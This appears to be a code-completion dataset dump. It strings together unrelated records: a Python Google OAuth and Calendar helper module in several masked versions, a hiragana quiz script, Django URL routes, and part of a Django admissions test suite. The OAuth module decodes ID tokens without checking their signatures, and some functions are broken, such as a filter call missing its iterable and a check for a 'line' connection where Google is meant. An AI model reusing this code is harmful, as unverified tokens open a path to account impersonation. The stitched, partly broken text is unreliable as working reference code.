"step-2": "<mask token>\n\n\ndef get_certs_keys(kid):\n url = 'https://www.googleapis.com/oauth2/v3/certs'\n data = requests.get(url).json()['keys']\n return next(filter(lambda e: kid == e['kid']), None)\n\n\ndef get_redirect_link(realid=None):\n state = util.generate_id(50)\n certificate.register_state(state, 'google_oauth', {'realid': realid})\n return ('https://accounts.google.com/o/oauth2/v2/auth?' +\n f'client_id={client_id}&' + f\"include_granted_scopes={'true'}&\" +\n f'redirect_uri={redirect_uri}&' + f'scope={scope}&' +\n f'access_type={access_type}&' + f'state={state}&' +\n f'prompt={prompt}&' + f'response_type={response_type}')\n\n\ndef code_to_refresh_token(code):\n endpoint = 'https://oauth2.googleapis.com/token'\n tokens = requests.post(endpoint, {'code': code, 'client_id': client_id,\n 'client_secret': settings.google.google_client_secret(),\n 'redirect_uri': redirect_uri, 'grant_type': 'authorization_code'}\n ).json()\n header, profile = decode_id_token(tokens['id_token'])\n return profile, tokens\n\n\ndef decode_base64_padding(s):\n return base64.urlsafe_b64decode(s + '=' * (-len(s) % 4)).decode()\n\n\ndef decode_id_token(id_token):\n s = id_token.split('.')\n header = json.loads(decode_base64_padding(s[0]))\n payload = json.loads(decode_base64_padding(s[1]))\n return header, payload\n\n\ndef register(profile, tokens, realid=None):\n profile.update(tokens)\n user = users_db.find_one({'_id': ObjectId(realid),\n 'connections.google.sub': profile['sub']})\n if realid:\n users_db.update_one({'_id': ObjectId(realid)}, {'$set': {\n 'connections.google': profile}, '$inc': {'connections.length': \n 0 if user else 1}})\n print('add google info')\n else:\n users_db.insert_one({'connections': {'google': profile, 'length': 1}})\n print('connect with google')\n\n\ndef refresh_token(refresh_token):\n endpoint = 'https://oauth2.googleapis.com/token'\n return requests.post(endpoint, {'client_id': client_id, 'client_secret':\n settings.google.google_client_secret(), 'refresh_token':\n refresh_token, 'grant_type': 'refresh_token'}).json()\n\n\ndef verify_access_token(access_token):\n url = (\n f'https://oauth2.googleapis.com/tokeninfo?access_token={access_token}')\n return requests.get(url).status_code == 200\n\n\ndef get_access_token(google_user_id):\n data = Just(users_db.find_one({'connections.google.sub': google_user_id}))\n access_token = data.connections.google.access_token()\n _refresh_token = data.connections.google.refresh_token()\n assert _refresh_token\n if access_token and verify_access_token(access_token):\n return access_token\n else:\n return Just(refresh_token(_refresh_token)).access_token()\n\n\ndef get_real_user_id(user_id):\n return str(users_db.find_one({'connections.google.sub': user_id})['_id'])\n\n\ndef get_google_user_id(real_user_id):\n data = Just(users_db.find_one({'_id': ObjectId(real_user_id)}))\n if data() and 'line' in data.connections():\n return data.connections.google.sub()\n else:\n raise RuntimeError\n\n\ndef add_event(real_user_id, start, end, options={'summary': '',\n 'description': ''}):\n endpoint = (\n 'https://www.googleapis.com/calendar/v3/calendars/primary/events')\n d = {'end': {'dateTime': end, 'timeZone': 'Asia/Tokyo'}, 'start': {\n 'dateTime': start, 'timeZone': 'Asia/Tokyo'}}\n d.update(options)\n res = requests.post(endpoint, json=d, headers={'content-type':\n 'application/json', 'authorization':\n f'Bearer {get_access_token(get_google_user_id(real_user_id))}'})\n r = res.status_code == 200\n if not r:\n print(res.text)\n return r\n",
"step-3": "<mask token>\nisinpackage = not __name__ in ['google_api', '__main__']\nif isinpackage:\n from .settings import settings\n from . import util\n from .util import Just\n from .db import get_collection\n from . import certificate\nelse:\n from settings import settings\n from util import Just\n from db import get_collection\nusers_db = get_collection('users')\nclient_id = settings.google.client_id()\nredirect_uri = f'{settings.url_prefix()}/api/v1/oauth/google/redirect'\nscope = urllib.parse.quote(settings.google.scope(), safe='')\naccess_type = settings.google.access_type()\nprompt = settings.google.prompt()\nresponse_type = settings.google.response_type()\n\n\ndef get_certs_keys(kid):\n url = 'https://www.googleapis.com/oauth2/v3/certs'\n data = requests.get(url).json()['keys']\n return next(filter(lambda e: kid == e['kid']), None)\n\n\ndef get_redirect_link(realid=None):\n state = util.generate_id(50)\n certificate.register_state(state, 'google_oauth', {'realid': realid})\n return ('https://accounts.google.com/o/oauth2/v2/auth?' +\n f'client_id={client_id}&' + f\"include_granted_scopes={'true'}&\" +\n f'redirect_uri={redirect_uri}&' + f'scope={scope}&' +\n f'access_type={access_type}&' + f'state={state}&' +\n f'prompt={prompt}&' + f'response_type={response_type}')\n\n\ndef code_to_refresh_token(code):\n endpoint = 'https://oauth2.googleapis.com/token'\n tokens = requests.post(endpoint, {'code': code, 'client_id': client_id,\n 'client_secret': settings.google.google_client_secret(),\n 'redirect_uri': redirect_uri, 'grant_type': 'authorization_code'}\n ).json()\n header, profile = decode_id_token(tokens['id_token'])\n return profile, tokens\n\n\ndef decode_base64_padding(s):\n return base64.urlsafe_b64decode(s + '=' * (-len(s) % 4)).decode()\n\n\ndef decode_id_token(id_token):\n s = id_token.split('.')\n header = json.loads(decode_base64_padding(s[0]))\n payload = json.loads(decode_base64_padding(s[1]))\n return header, payload\n\n\ndef register(profile, tokens, realid=None):\n profile.update(tokens)\n user = users_db.find_one({'_id': ObjectId(realid),\n 'connections.google.sub': profile['sub']})\n if realid:\n users_db.update_one({'_id': ObjectId(realid)}, {'$set': {\n 'connections.google': profile}, '$inc': {'connections.length': \n 0 if user else 1}})\n print('add google info')\n else:\n users_db.insert_one({'connections': {'google': profile, 'length': 1}})\n print('connect with google')\n\n\ndef refresh_token(refresh_token):\n endpoint = 'https://oauth2.googleapis.com/token'\n return requests.post(endpoint, {'client_id': client_id, 'client_secret':\n settings.google.google_client_secret(), 'refresh_token':\n refresh_token, 'grant_type': 'refresh_token'}).json()\n\n\ndef verify_access_token(access_token):\n url = (\n f'https://oauth2.googleapis.com/tokeninfo?access_token={access_token}')\n return requests.get(url).status_code == 200\n\n\ndef get_access_token(google_user_id):\n data = Just(users_db.find_one({'connections.google.sub': google_user_id}))\n access_token = data.connections.google.access_token()\n _refresh_token = data.connections.google.refresh_token()\n assert _refresh_token\n if access_token and verify_access_token(access_token):\n return access_token\n else:\n return Just(refresh_token(_refresh_token)).access_token()\n\n\ndef get_real_user_id(user_id):\n return str(users_db.find_one({'connections.google.sub': user_id})['_id'])\n\n\ndef get_google_user_id(real_user_id):\n data = Just(users_db.find_one({'_id': ObjectId(real_user_id)}))\n if data() and 'line' in data.connections():\n return data.connections.google.sub()\n else:\n raise RuntimeError\n\n\ndef add_event(real_user_id, start, end, options={'summary': '',\n 'description': ''}):\n endpoint = (\n 'https://www.googleapis.com/calendar/v3/calendars/primary/events')\n d = {'end': {'dateTime': end, 'timeZone': 'Asia/Tokyo'}, 'start': {\n 'dateTime': start, 'timeZone': 'Asia/Tokyo'}}\n d.update(options)\n res = requests.post(endpoint, json=d, headers={'content-type':\n 'application/json', 'authorization':\n f'Bearer {get_access_token(get_google_user_id(real_user_id))}'})\n r = res.status_code == 200\n if not r:\n print(res.text)\n return r\n",
"step-4": "import datetime\nfrom datetime import datetime, timedelta\nimport time\nimport json\nimport base64\nimport requests\nfrom bson.objectid import ObjectId\nimport urllib\nisinpackage = not __name__ in ['google_api', '__main__']\nif isinpackage:\n from .settings import settings\n from . import util\n from .util import Just\n from .db import get_collection\n from . import certificate\nelse:\n from settings import settings\n from util import Just\n from db import get_collection\nusers_db = get_collection('users')\nclient_id = settings.google.client_id()\nredirect_uri = f'{settings.url_prefix()}/api/v1/oauth/google/redirect'\nscope = urllib.parse.quote(settings.google.scope(), safe='')\naccess_type = settings.google.access_type()\nprompt = settings.google.prompt()\nresponse_type = settings.google.response_type()\n\n\ndef get_certs_keys(kid):\n url = 'https://www.googleapis.com/oauth2/v3/certs'\n data = requests.get(url).json()['keys']\n return next(filter(lambda e: kid == e['kid']), None)\n\n\ndef get_redirect_link(realid=None):\n state = util.generate_id(50)\n certificate.register_state(state, 'google_oauth', {'realid': realid})\n return ('https://accounts.google.com/o/oauth2/v2/auth?' +\n f'client_id={client_id}&' + f\"include_granted_scopes={'true'}&\" +\n f'redirect_uri={redirect_uri}&' + f'scope={scope}&' +\n f'access_type={access_type}&' + f'state={state}&' +\n f'prompt={prompt}&' + f'response_type={response_type}')\n\n\ndef code_to_refresh_token(code):\n endpoint = 'https://oauth2.googleapis.com/token'\n tokens = requests.post(endpoint, {'code': code, 'client_id': client_id,\n 'client_secret': settings.google.google_client_secret(),\n 'redirect_uri': redirect_uri, 'grant_type': 'authorization_code'}\n ).json()\n header, profile = decode_id_token(tokens['id_token'])\n return profile, tokens\n\n\ndef decode_base64_padding(s):\n return base64.urlsafe_b64decode(s + '=' * (-len(s) % 4)).decode()\n\n\ndef decode_id_token(id_token):\n s = id_token.split('.')\n header = json.loads(decode_base64_padding(s[0]))\n payload = json.loads(decode_base64_padding(s[1]))\n return header, payload\n\n\ndef register(profile, tokens, realid=None):\n profile.update(tokens)\n user = users_db.find_one({'_id': ObjectId(realid),\n 'connections.google.sub': profile['sub']})\n if realid:\n users_db.update_one({'_id': ObjectId(realid)}, {'$set': {\n 'connections.google': profile}, '$inc': {'connections.length': \n 0 if user else 1}})\n print('add google info')\n else:\n users_db.insert_one({'connections': {'google': profile, 'length': 1}})\n print('connect with google')\n\n\ndef refresh_token(refresh_token):\n endpoint = 'https://oauth2.googleapis.com/token'\n return requests.post(endpoint, {'client_id': client_id, 'client_secret':\n settings.google.google_client_secret(), 'refresh_token':\n refresh_token, 'grant_type': 'refresh_token'}).json()\n\n\ndef verify_access_token(access_token):\n url = (\n f'https://oauth2.googleapis.com/tokeninfo?access_token={access_token}')\n return requests.get(url).status_code == 200\n\n\ndef get_access_token(google_user_id):\n data = Just(users_db.find_one({'connections.google.sub': google_user_id}))\n access_token = data.connections.google.access_token()\n _refresh_token = data.connections.google.refresh_token()\n assert _refresh_token\n if access_token and verify_access_token(access_token):\n return access_token\n else:\n return Just(refresh_token(_refresh_token)).access_token()\n\n\ndef get_real_user_id(user_id):\n return str(users_db.find_one({'connections.google.sub': user_id})['_id'])\n\n\ndef get_google_user_id(real_user_id):\n data = Just(users_db.find_one({'_id': ObjectId(real_user_id)}))\n if data() and 'line' in data.connections():\n return data.connections.google.sub()\n else:\n raise RuntimeError\n\n\ndef add_event(real_user_id, start, end, options={'summary': '',\n 'description': ''}):\n endpoint = (\n 'https://www.googleapis.com/calendar/v3/calendars/primary/events')\n d = {'end': {'dateTime': end, 'timeZone': 'Asia/Tokyo'}, 'start': {\n 'dateTime': start, 'timeZone': 'Asia/Tokyo'}}\n d.update(options)\n res = requests.post(endpoint, json=d, headers={'content-type':\n 'application/json', 'authorization':\n f'Bearer {get_access_token(get_google_user_id(real_user_id))}'})\n r = res.status_code == 200\n if not r:\n print(res.text)\n return r\n",
"step-5": "import datetime\nfrom datetime import datetime, timedelta\nimport time\nimport json\nimport base64\nimport requests\nfrom bson.objectid import ObjectId\nimport urllib\nisinpackage = not __name__ in ['google_api', '__main__']\nif isinpackage:\n from .settings import settings\n from . import util\n from .util import Just\n from .db import get_collection\n from .import certificate\nelse:\n from settings import settings\n # import util\n from util import Just\n from db import get_collection\n # import certificate\n\n\nusers_db = get_collection('users')\n\n\nclient_id = settings.google.client_id()\nredirect_uri = f'{settings.url_prefix()}/api/v1/oauth/google/redirect'\nscope = urllib.parse.quote(settings.google.scope(), safe='')\naccess_type = settings.google.access_type()\nprompt = settings.google.prompt()\nresponse_type = settings.google.response_type()\n\n\ndef get_certs_keys(kid):\n url = 'https://www.googleapis.com/oauth2/v3/certs'\n data = requests.get(url).json()['keys']\n return next(filter(lambda e: kid == e['kid']), None)\n\n\ndef get_redirect_link(realid=None):\n state = util.generate_id(50)\n certificate.register_state(state, \"google_oauth\", {\"realid\": realid})\n return 'https://accounts.google.com/o/oauth2/v2/auth?' \\\n + f\"client_id={client_id}&\" \\\n + f\"include_granted_scopes={'true'}&\" \\\n + f\"redirect_uri={redirect_uri}&\" \\\n + f\"scope={scope}&\" \\\n + f\"access_type={access_type}&\" \\\n + f\"state={state}&\" \\\n + f\"prompt={prompt}&\" \\\n + f\"response_type={response_type}\"\n\n\ndef code_to_refresh_token(code):\n endpoint = 'https://oauth2.googleapis.com/token'\n tokens = requests.post(endpoint, {\n 'code': code,\n 'client_id': client_id,\n 'client_secret': settings.google.google_client_secret(),\n 'redirect_uri': redirect_uri,\n 'grant_type': 'authorization_code'\n }).json()\n header, profile = decode_id_token(tokens['id_token'])\n return profile, tokens\n\n\ndef decode_base64_padding(s):\n return base64.urlsafe_b64decode(s + '=' * (-len(s) % 4)).decode()\n\n\ndef decode_id_token(id_token):\n s = id_token.split('.')\n header = json.loads(decode_base64_padding(s[0]))\n payload = json.loads(decode_base64_padding(s[1]))\n # key = get_certs_keys(header['kid'])\n return header, payload\n\n\ndef register(profile, tokens, realid=None):\n profile.update(tokens)\n user = users_db.find_one({'_id': ObjectId(realid), 'connections.google.sub': profile['sub']})\n if realid:\n users_db.update_one({'_id': ObjectId(realid)}, {\n '$set': {\n 'connections.google': profile,\n },\n '$inc': {\n 'connections.length': 0 if user else 1\n }\n })\n print('add google info')\n else:\n users_db.insert_one({\n 'connections': {\n 'google': profile,\n 'length': 1\n }\n })\n print('connect with google')\n\n\ndef refresh_token(refresh_token):\n endpoint = 'https://oauth2.googleapis.com/token'\n return requests.post(endpoint, {\n 'client_id': client_id,\n 'client_secret': settings.google.google_client_secret(),\n 'refresh_token': refresh_token,\n 'grant_type': 'refresh_token'\n }).json()\n\n\ndef verify_access_token(access_token):\n url = f'https://oauth2.googleapis.com/tokeninfo?access_token={access_token}'\n return requests.get(url).status_code == 200\n\n\ndef get_access_token(google_user_id):\n data = Just(users_db.find_one({'connections.google.sub': google_user_id}))\n access_token = data.connections.google.access_token()\n _refresh_token = data.connections.google.refresh_token()\n assert _refresh_token\n if access_token and verify_access_token(access_token):\n return access_token\n else:\n return Just(refresh_token(_refresh_token)).access_token()\n\n\ndef get_real_user_id(user_id):\n return str(users_db.find_one({\"connections.google.sub\": user_id})[\"_id\"])\n\n\ndef get_google_user_id(real_user_id):\n data = Just(users_db.find_one({\"_id\": ObjectId(real_user_id)}))\n if data() and ('line' in data.connections()):\n return data.connections.google.sub()\n else:\n raise RuntimeError\n\n\ndef add_event(real_user_id, start, end, options={\n 'summary': '',\n 'description': ''\n}):\n endpoint = 'https://www.googleapis.com/calendar/v3/calendars/primary/events'\n d = {\n 'end': {\n 'dateTime': end,\n 'timeZone': 'Asia/Tokyo'\n },\n 'start': {\n 'dateTime': start,\n 'timeZone': 'Asia/Tokyo'\n },\n }\n d.update(options)\n res = requests.post(endpoint, json=d, headers={\n 'content-type': 'application/json',\n 'authorization': f'Bearer {get_access_token(get_google_user_id(real_user_id))}'\n })\n r = res.status_code == 200\n if not r:\n print(res.text)\n return r\n",
"step-ids": [
11,
12,
14,
15,
16
]
}
|
[
11,
12,
14,
15,
16
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def Fun_hiraganas():
hiraganas = ['a', 'i', 'u', 'e', 'o', 'ka', 'ki', 'ku', 'ke', 'ko',
'sa', 'shi', 'su', 'se', 'so', 'ta', 'chi', 'tsu', 'te', 'to', 'na',
'ni', 'nu', 'ne', 'no', 'ha', 'hi', 'fu', 'he', 'ho']
print('escriba el hiragana', hiraganas[random.randint(0, len(hiraganas) -
1)])
print('Hello, type exit if you want to leave')
<|reserved_special_token_0|>
while answer.lower() != 'exit':
Fun_hiraganas()
answer = input('Type exit if you want to leave')
print('bye')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def Fun_hiraganas():
hiraganas = ['a', 'i', 'u', 'e', 'o', 'ka', 'ki', 'ku', 'ke', 'ko',
'sa', 'shi', 'su', 'se', 'so', 'ta', 'chi', 'tsu', 'te', 'to', 'na',
'ni', 'nu', 'ne', 'no', 'ha', 'hi', 'fu', 'he', 'ho']
print('escriba el hiragana', hiraganas[random.randint(0, len(hiraganas) -
1)])
print('Hello, type exit if you want to leave')
answer = ''
while answer.lower() != 'exit':
Fun_hiraganas()
answer = input('Type exit if you want to leave')
print('bye')
<|reserved_special_token_1|>
import random
def Fun_hiraganas():
hiraganas = ['a', 'i', 'u', 'e', 'o', 'ka', 'ki', 'ku', 'ke', 'ko',
'sa', 'shi', 'su', 'se', 'so', 'ta', 'chi', 'tsu', 'te', 'to', 'na',
'ni', 'nu', 'ne', 'no', 'ha', 'hi', 'fu', 'he', 'ho']
print('escriba el hiragana', hiraganas[random.randint(0, len(hiraganas) -
1)])
print('Hello, type exit if you want to leave')
answer = ''
while answer.lower() != 'exit':
Fun_hiraganas()
answer = input('Type exit if you want to leave')
print('bye')
<|reserved_special_token_1|>
import random
def Fun_hiraganas():
hiraganas = ['a', 'i', 'u', 'e', 'o', 'ka', 'ki', 'ku', 'ke', 'ko', 'sa', 'shi', 'su', 'se',
'so', 'ta', 'chi', 'tsu', 'te', 'to', 'na', 'ni', 'nu', 'ne', 'no', 'ha', 'hi', 'fu', 'he', 'ho']
print("escriba el hiragana", hiraganas[random.randint(0, len(hiraganas)-1)])
print("Hello, type exit if you want to leave")
answer = ""
while answer.lower() != 'exit':
Fun_hiraganas()
answer = input("Type exit if you want to leave")
print("bye")
|
flexible
|
{
"blob_id": "1fe7d5db1b47ba082301d07d010c6796fbd7edb7",
"index": 6859,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef Fun_hiraganas():\n hiraganas = ['a', 'i', 'u', 'e', 'o', 'ka', 'ki', 'ku', 'ke', 'ko',\n 'sa', 'shi', 'su', 'se', 'so', 'ta', 'chi', 'tsu', 'te', 'to', 'na',\n 'ni', 'nu', 'ne', 'no', 'ha', 'hi', 'fu', 'he', 'ho']\n print('escriba el hiragana', hiraganas[random.randint(0, len(hiraganas) -\n 1)])\n\n\nprint('Hello, type exit if you want to leave')\n<mask token>\nwhile answer.lower() != 'exit':\n Fun_hiraganas()\n answer = input('Type exit if you want to leave')\nprint('bye')\n",
"step-3": "<mask token>\n\n\ndef Fun_hiraganas():\n hiraganas = ['a', 'i', 'u', 'e', 'o', 'ka', 'ki', 'ku', 'ke', 'ko',\n 'sa', 'shi', 'su', 'se', 'so', 'ta', 'chi', 'tsu', 'te', 'to', 'na',\n 'ni', 'nu', 'ne', 'no', 'ha', 'hi', 'fu', 'he', 'ho']\n print('escriba el hiragana', hiraganas[random.randint(0, len(hiraganas) -\n 1)])\n\n\nprint('Hello, type exit if you want to leave')\nanswer = ''\nwhile answer.lower() != 'exit':\n Fun_hiraganas()\n answer = input('Type exit if you want to leave')\nprint('bye')\n",
"step-4": "import random\n\n\ndef Fun_hiraganas():\n hiraganas = ['a', 'i', 'u', 'e', 'o', 'ka', 'ki', 'ku', 'ke', 'ko',\n 'sa', 'shi', 'su', 'se', 'so', 'ta', 'chi', 'tsu', 'te', 'to', 'na',\n 'ni', 'nu', 'ne', 'no', 'ha', 'hi', 'fu', 'he', 'ho']\n print('escriba el hiragana', hiraganas[random.randint(0, len(hiraganas) -\n 1)])\n\n\nprint('Hello, type exit if you want to leave')\nanswer = ''\nwhile answer.lower() != 'exit':\n Fun_hiraganas()\n answer = input('Type exit if you want to leave')\nprint('bye')\n",
"step-5": "import random\n\ndef Fun_hiraganas():\n\thiraganas = ['a', 'i', 'u', 'e', 'o', 'ka', 'ki', 'ku', 'ke', 'ko', 'sa', 'shi', 'su', 'se', \n\t'so', 'ta', 'chi', 'tsu', 'te', 'to', 'na', 'ni', 'nu', 'ne', 'no', 'ha', 'hi', 'fu', 'he', 'ho']\n\tprint(\"escriba el hiragana\", hiraganas[random.randint(0, len(hiraganas)-1)])\n\nprint(\"Hello, type exit if you want to leave\")\nanswer = \"\"\nwhile answer.lower() != 'exit':\n\tFun_hiraganas() \n\tanswer = input(\"Type exit if you want to leave\")\nprint(\"bye\")\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
from django.conf.urls import url
from ..views import (buildings_upload, keytype_upload, key_upload, keystatus_upload, keyissue_upload)
from django.contrib.auth.decorators import login_required
urlpatterns = [
url(r'^buildings_csv/$', # NOQA
buildings_upload,
name="buildings_upload"),
url(r'^keytype_csv/$', # NOQA
keytype_upload,
name="keytype_upload"),
url(r'^key_csv/$', # NOQA
key_upload,
name="key_upload"),
url(r'^keystatus_csv/$', # NOQA
keystatus_upload,
name="keystatus_upload"),
url(r'^keyissue_csv/$', # NOQA
keyissue_upload,
name="keyissue_upload"),
]
|
normal
|
{
"blob_id": "4a0d8e6b6205fa57b8614857e1462203a2a7d2c5",
"index": 3002,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [url('^buildings_csv/$', buildings_upload, name=\n 'buildings_upload'), url('^keytype_csv/$', keytype_upload, name=\n 'keytype_upload'), url('^key_csv/$', key_upload, name='key_upload'),\n url('^keystatus_csv/$', keystatus_upload, name='keystatus_upload'), url\n ('^keyissue_csv/$', keyissue_upload, name='keyissue_upload')]\n",
"step-3": "from django.conf.urls import url\nfrom ..views import buildings_upload, keytype_upload, key_upload, keystatus_upload, keyissue_upload\nfrom django.contrib.auth.decorators import login_required\nurlpatterns = [url('^buildings_csv/$', buildings_upload, name=\n 'buildings_upload'), url('^keytype_csv/$', keytype_upload, name=\n 'keytype_upload'), url('^key_csv/$', key_upload, name='key_upload'),\n url('^keystatus_csv/$', keystatus_upload, name='keystatus_upload'), url\n ('^keyissue_csv/$', keyissue_upload, name='keyissue_upload')]\n",
"step-4": "from django.conf.urls import url\nfrom ..views import (buildings_upload, keytype_upload, key_upload, keystatus_upload, keyissue_upload)\nfrom django.contrib.auth.decorators import login_required\n\nurlpatterns = [\n url(r'^buildings_csv/$', # NOQA\n buildings_upload,\n name=\"buildings_upload\"),\n url(r'^keytype_csv/$', # NOQA\n keytype_upload,\n name=\"keytype_upload\"),\n url(r'^key_csv/$', # NOQA\n key_upload,\n name=\"key_upload\"),\n url(r'^keystatus_csv/$', # NOQA\n keystatus_upload,\n name=\"keystatus_upload\"),\n url(r'^keyissue_csv/$', # NOQA\n keyissue_upload,\n name=\"keyissue_upload\"),\n]\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class CohortIdUserIdTestSuite(AdmissionsTestCase):
<|reserved_special_token_0|>
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_without_auth(self):
"""Test /cohort/:id/user/:id without auth"""
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': 1, 'user_id': 1})
response = self.client.get(url)
json = response.json()
self.assertEqual(json, {'detail':
'Authentication credentials were not provided.', 'status_code':
status.HTTP_401_UNAUTHORIZED})
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_bad_cohort_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': 1, 'user_id': 1})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail': 'invalid cohort_id'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_id_but_without_user(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'Specified cohort not be found'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_id_but_with_user(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'Specified cohort not be found'}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, specialty_mode=True, profile_academy=True, cohort_user=True)
model_dict = self.get_cohort_user_dict(1)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {'specialty_mode': model.specialty_mode.id}
response = self.client.put(url, data)
json = response.json()
expected = {'id': model.cohort_user.id, 'role': model.cohort_user.
role, 'educational_status': model.cohort_user.
educational_status, 'finantial_status': model.cohort_user.
finantial_status}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.count_cohort_user(), 1)
self.assertEqual(self.get_cohort_user_dict(1), model_dict)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_delete_with_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, specialty_mode=True, profile_academy=True, cohort_user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {'specialty_mode': model.specialty_mode.id}
response = self.client.delete(url, data)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertEqual(self.count_cohort_user(), 0)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_unsuccess_task(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, profile_academy=True, cohort_user=True, task=True,
task_status='PENDING', task_type='PROJECT')
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {'educational_status': 'GRADUATED'}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'User has tasks with status pending the educational status cannot be GRADUATED'
}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_unsuccess_finantial_status(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True, cohort=True, user=
True, profile_academy=True, cohort_user=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': model.cohort.id, 'user_id': model.user.id})
data = {'educational_status': 'GRADUATED', 'finantial_status': 'LATE'}
response = self.client.put(url, data)
json = response.json()
expected = {'status_code': 400, 'detail':
'Cannot be marked as `GRADUATED` if its financial status is `LATE`'
}
self.assertEqual(json, expected)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CohortIdUserIdTestSuite(AdmissionsTestCase):
<|reserved_special_token_0|>
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_without_auth(self):
"""Test /cohort/:id/user/:id without auth"""
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
'cohort_id': 1, 'user_id': 1})
response = self.client.get(url)
json = response.json()
self.assertEqual(json, {'detail':
'Authentication credentials were not provided.', 'status_code':
status.HTTP_401_UNAUTHORIZED})
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
@patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())
@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())
@patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())
def test_cohort_id_user_id_put_with_bad_cohort_id(self):
"""Test /cohort/:id/user/:id without auth"""
model = self.generate_models(authenticate=True)
url = reverse_lazy('admissions:cohort_id_user_id', kwargs={
